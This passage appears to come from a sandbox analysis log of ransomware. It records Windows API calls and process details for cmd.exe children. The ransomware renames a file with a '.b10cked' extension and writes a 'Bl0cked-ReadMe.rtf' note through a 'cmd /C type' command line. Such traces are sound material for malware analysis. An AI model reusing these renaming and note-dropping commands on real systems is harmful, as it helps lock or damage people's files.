lpValue="$P$G") returned 1 [0202.411] GetEnvironmentStringsW () returned 0x2722e0* [0202.411] FreeEnvironmentStringsW (penv=0x2722e0) returned 1 [0202.411] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.411] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.411] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0202.411] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0202.411] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0202.411] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0202.411] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0202.411] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0202.411] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0202.411] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0202.411] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20f720 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.411] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20f720, lpFilePart=0x20f71c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20f71c*="Desktop") returned 0x18 [0202.411] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.411] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f49c | out: lpFindFileData=0x20f49c) returned 0x270020 [0202.411] FindClose (in: hFindFile=0x270020 | out: hFindFile=0x270020) returned 1 [0202.411] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f49c | out: lpFindFileData=0x20f49c) returned 0x270020 [0202.411] FindClose (in: hFindFile=0x270020 | out: hFindFile=0x270020) returned 1 [0202.412] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", 
lpFindFileData=0x20f49c | out: lpFindFileData=0x20f49c) returned 0x270020 [0202.412] FindClose (in: hFindFile=0x270020 | out: hFindFile=0x270020) returned 1 [0202.412] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.412] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0202.412] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0202.412] GetEnvironmentStringsW () returned 0x272b00* [0202.412] FreeEnvironmentStringsW (penv=0x272b00) returned 1 [0202.412] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.412] GetConsoleOutputCP () returned 0x1b5 [0202.412] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.412] GetUserDefaultLCID () returned 0x409 [0202.413] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0202.413] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20f860, cchData=128 | out: lpLCData="0") returned 2 [0202.413] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20f860, cchData=128 | out: lpLCData="0") returned 2 [0202.413] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20f860, cchData=128 | out: lpLCData="1") returned 2 [0202.413] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0202.413] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0202.413] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0202.413] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0202.413] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0202.413] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0202.413] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0202.413] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0202.413] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0202.413] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0202.413] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0202.414] GetConsoleTitleW (in: lpConsoleTitle=0x2608e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.414] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.414] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0202.414] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0202.414] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0202.415] _wcsicmp (_String1="move", _String2=")") returned 68 [0202.415] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0202.415] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0202.415] _wcsicmp (_String1="IF", _String2="move") returned -4 [0202.415] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0202.415] _wcsicmp (_String1="REM", _String2="move") returned 5 [0202.415] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0202.418] GetConsoleTitleW (in: lpConsoleTitle=0x20f558, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.418] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0202.418] _wcsicmp (_String1="move", 
_String2="ERASE") returned 8 [0202.418] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0202.418] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0202.418] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0202.418] _wcsicmp (_String1="move", _String2="CD") returned 10 [0202.418] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0202.418] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0202.418] _wcsicmp (_String1="move", _String2="REN") returned -5 [0202.418] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0202.418] _wcsicmp (_String1="move", _String2="SET") returned -6 [0202.418] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0202.418] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0202.418] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0202.418] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0202.418] _wcsicmp (_String1="move", _String2="MD") returned 11 [0202.418] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0202.418] _wcsicmp (_String1="move", _String2="RD") returned -5 [0202.418] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0202.418] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0202.418] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0202.418] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0202.418] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0202.418] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0202.418] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0202.418] _wcsicmp (_String1="move", _String2="VER") returned -9 [0202.418] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0202.418] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0202.419] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0202.419] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0202.419] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0202.419] _wcsicmp 
(_String1="move", _String2="START") returned -6 [0202.419] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0202.419] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0202.419] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0202.420] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.420] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.420] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x20f314, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x20f30c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20f30c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0202.421] _wcsnicmp (_String1="COPYCMD", 
_String2="Path=C:", _MaxCount=0x7) returned -13 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0202.421] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0202.422] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0202.422] _wcsicmp (_String1="state.rsm", _String2=".") returned 69 [0202.422] _wcsicmp (_String1="state.rsm", _String2="..") returned 69 [0202.422] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm" (normalized: 
"c:\\users\\alluse~1\\packag~1\\{33d1f~1\\state.rsm")) returned 0x20 [0202.550] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x271e50 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.550] SetErrorMode (uMode=0x0) returned 0x0 [0202.550] SetErrorMode (uMode=0x1) returned 0x0 [0202.550] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm", nBufferLength=0x104, lpBuffer=0x20ec9c, lpFilePart=0x20ec84 | out: lpBuffer="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm", lpFilePart=0x20ec84*="state.rsm") returned 0x2d [0202.550] SetErrorMode (uMode=0x0) returned 0x1 [0202.550] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1" (normalized: "c:\\users\\alluse~1\\packag~1\\{33d1f~1")) returned 0x10 [0202.550] _wcsicmp (_String1="state.rsm", _String2=".") returned 69 [0202.550] _wcsicmp (_String1="state.rsm", _String2="..") returned 69 [0202.550] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm" (normalized: "c:\\users\\alluse~1\\packag~1\\{33d1f~1\\state.rsm")) returned 0x20 [0202.550] SetErrorMode (uMode=0x0) returned 0x0 [0202.550] SetErrorMode (uMode=0x1) returned 0x0 [0202.550] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm", nBufferLength=0x104, lpBuffer=0x20f118, lpFilePart=0x20eeb0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm", lpFilePart=0x20eeb0*="state.rsm") returned 0x2d [0202.550] SetErrorMode (uMode=0x0) returned 0x1 [0202.550] SetErrorMode (uMode=0x0) returned 0x0 [0202.550] SetErrorMode (uMode=0x1) returned 0x0 [0202.550] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm.b10cked", nBufferLength=0x104, lpBuffer=0x20f320, lpFilePart=0x20eeb0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm.b10cked", lpFilePart=0x20eeb0*="state.rsm.b10cked") returned 0x35 [0202.550] SetErrorMode (uMode=0x0) returned 0x1 [0202.550] SetLastError 
(dwErrCode=0x0) [0202.550] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm.b10cked" (normalized: "c:\\users\\alluse~1\\packag~1\\{33d1f~1\\state.rsm.b10cked")) returned 0xffffffff [0202.551] GetLastError () returned 0x2 [0202.551] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm", fInfoLevelId=0x1, lpFindFileData=0x20e82c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20e82c) returned 0x260e88 [0202.551] FindNextFileW (in: hFindFile=0x260e88, lpFindFileData=0x20e82c | out: lpFindFileData=0x20e82c) returned 0 [0202.551] GetLastError () returned 0x12 [0202.551] FindClose (in: hFindFile=0x260e88 | out: hFindFile=0x260e88) returned 1 [0202.552] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm", fInfoLevelId=0x1, lpFindFileData=0x271bf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x271bf0) returned 0x260e88 [0202.552] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm.b10cked", nBufferLength=0x104, lpBuffer=0x20eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm.b10cked", lpFilePart=0x0) returned 0x35 [0202.552] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm", nBufferLength=0x104, lpBuffer=0x20eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm", lpFilePart=0x0) returned 0x2d [0202.552] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm" (normalized: "c:\\users\\alluse~1\\packag~1\\{33d1f~1\\state.rsm")) returned 0x20 [0202.552] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm" (normalized: "c:\\users\\alluse~1\\packag~1\\{33d1f~1\\state.rsm"), lpNewFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm.b10cked" (normalized: 
"c:\\users\\alluse~1\\packag~1\\{33d1f~1\\state.rsm.b10cked"), dwFlags=0x3) returned 1 [0202.553] FindClose (in: hFindFile=0x260e88 | out: hFindFile=0x260e88) returned 1 [0202.553] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x20ea78 | out: _Buffer=" 1") returned 9 [0202.553] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.553] GetFileType (hFile=0x7) returned 0x2 [0202.557] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0202.557] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x20ea04 | out: lpMode=0x20ea04) returned 1 [0202.561] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.561] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ea38 | out: lpConsoleScreenBufferInfo=0x20ea38) returned 1 [0202.561] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0202.562] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x20ea78 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0202.562] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x20ea5c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x20ea5c*=0x1a) returned 1 [0202.562] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.562] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.562] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.562] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.562] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.562] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.562] SetConsoleInputExeNameW () returned 0x1 [0202.562] GetConsoleOutputCP () returned 0x1b5 [0202.563] GetCPInfo (in: 
CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.563] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.563] exit (_Code=0) Process: id = "488" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b20" os_pid = "0xef0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29491 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29492 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29493 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29494 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 29495 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29496 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = 
"ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29497 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29498 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29499 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 29500 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29830 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29831 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29832 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29833 start_va = 0x460000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 29834 start_va = 0x4a0000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 29835 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29836 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = 
"kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29837 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29838 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29839 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29840 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29841 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29842 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29843 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 29844 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 29845 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: 
"c:\\windows\\system32\\imm32.dll") Region: id = 29846 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29847 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 29848 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 29849 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 29850 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 29851 start_va = 0x310000 end_va = 0x410fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 29852 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 29853 start_va = 0x11a0000 end_va = 0x1302fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011a0000" filename = "" Thread: id = 685 os_tid = 0xe1c [0202.336] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30fc5c | out: lpSystemTimeAsFileTime=0x30fc5c*(dwLowDateTime=0xad690a60, dwHighDateTime=0x1d440a9)) [0202.336] GetCurrentProcessId () returned 0xef0 [0202.336] GetCurrentThreadId () returned 0xe1c [0202.336] GetTickCount () returned 0x391b3 [0202.336] QueryPerformanceCounter (in: lpPerformanceCount=0x30fc54 | out: lpPerformanceCount=0x30fc54*=25912524457) returned 1 [0202.337] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0202.337] __set_app_type (_Type=0x1) [0202.337] __p__fmode () returned 0x76b331f4 [0202.337] __p__commode () returned 0x76b331fc 
